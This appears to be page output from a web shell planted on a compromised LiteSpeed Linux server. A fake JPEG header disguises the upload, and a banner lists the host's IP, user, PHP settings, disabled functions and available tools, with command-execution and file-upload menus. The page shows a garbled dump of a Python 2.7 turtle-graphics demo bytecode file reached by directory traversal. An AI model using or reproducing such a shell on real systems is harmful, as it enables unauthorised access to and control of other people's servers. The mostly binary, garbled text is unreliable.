����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.222.104.211 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /lib64/NetworkManager/../rsyslog/../dovecot/../python2.7/Demo/turtle/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
� ��^c @ sr d Z d d l m Z m Z m Z d d l m Z m Z d � Z d � Z e d k rn e � Z e GHe � n d S( sF turtle-example-suite: tdemo_wikipedia3.py This example is inspired by the Wikipedia article on turtle graphics. (See example wikipedia1 for URLs) First we create (ne-1) (i.e. 35 in this example) copies of our first turtle p. Then we let them perform their steps in parallel. Followed by a complete undo(). i����( t Screent Turtlet mainloop( t clockt sleepc C s� | g } xG t d | � D]6 } | j � } | j d | � | j | � | } q Wxv t | � D]h } t | d | � | d } xC | D]; } | j d | � | j d | d | � | j | � q� Wq` Wd S( Ni g �v@g @gffffff�?i ( t ranget clonet rtt appendt abst pencolort fd( t pt net szt turtlelistt it qt ct t( ( s3 /usr/lib64/python2.7/Demo/turtle/tdemo_wikipedia.pyt mn_eck s c C s t � } | j d � t � } | j d � | j � | j d � | j d � | j d d � t � } t | d d � t � } | | } t d � t � } xP t g | j � D] } | j � ^ q� � r� x | j � D] } | j � q� Wq� Wt � } d | | | S( Nt blacki t redi i$ i i s Laufzeit: %.3f sec( R t bgcolorR t speedt hideturtleR t pensizet tracerR R R t anyt turtlest undobufferentriest undo( t sR t att ett z1R ( ( s3 /usr/lib64/python2.7/Demo/turtle/tdemo_wikipedia.pyt main$ s&